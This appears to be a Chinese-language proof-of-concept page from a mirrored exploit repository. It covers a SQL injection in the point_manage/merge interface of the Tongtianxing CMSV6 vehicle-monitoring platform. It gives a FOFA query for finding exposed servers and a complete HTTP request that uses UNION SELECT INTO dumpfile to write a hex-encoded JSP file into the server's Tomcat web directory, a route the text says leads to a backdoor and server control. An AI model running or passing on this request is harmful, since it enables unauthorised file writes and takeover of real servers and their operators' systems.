admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-08-13 11:26:39 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/通天星/通天星CMSV6接口pointManage存在SQL注入.md

26 lines
1.4 KiB
Markdown
Raw Normal View History

first commit
2025-03-04 23:12:57 +08:00
## 通天星CMSV6接口pointManage存在SQL注入
通天星CMSV6车载定位监控平台拥有以位置服务、无线3G/4G视频传输、云存储服务为核心的研发团队专注于为定位、无线视频终端产品提供平台服务通天星CMSV6产品覆盖车载录像机、单兵录像机、网络监控摄像机、行驶记录仪等产品的视频综合平台。其pointManage存在SQL注入恶意攻击者利用此漏洞向服务器写入恶意的后门文件从而获取服务器权限。
## fofa
```
body="/808gps"
```
## poc
```
POST /point_manage/merge HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.2882.93 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Host: ip
id=1&name=1' UNION SELECT%0aNULL, 0x3c25206f75742e7072696e7428227a7a3031306622293b206e6577206a6176612e696f2e46696c65286170706c69636174696f6e2e6765745265616c5061746828726571756573742e676574536572766c657450617468282929292e64656c65746528293b20253e,NULL,NULL,NULL,NULL,NULL,NULL
INTO dumpfile '../../tomcat/webapps/gpsweb/allgods.jsp' FROM user_session a
WHERE '1 '='1 &type=3&map_id=4&install_place=5&check_item=6&create_time=7&update_time=8
```
![image-20240626220451434](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406262204554.png)
![image-20240626220720642](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406262207750.png)
Reference in New Issue Copy Permalink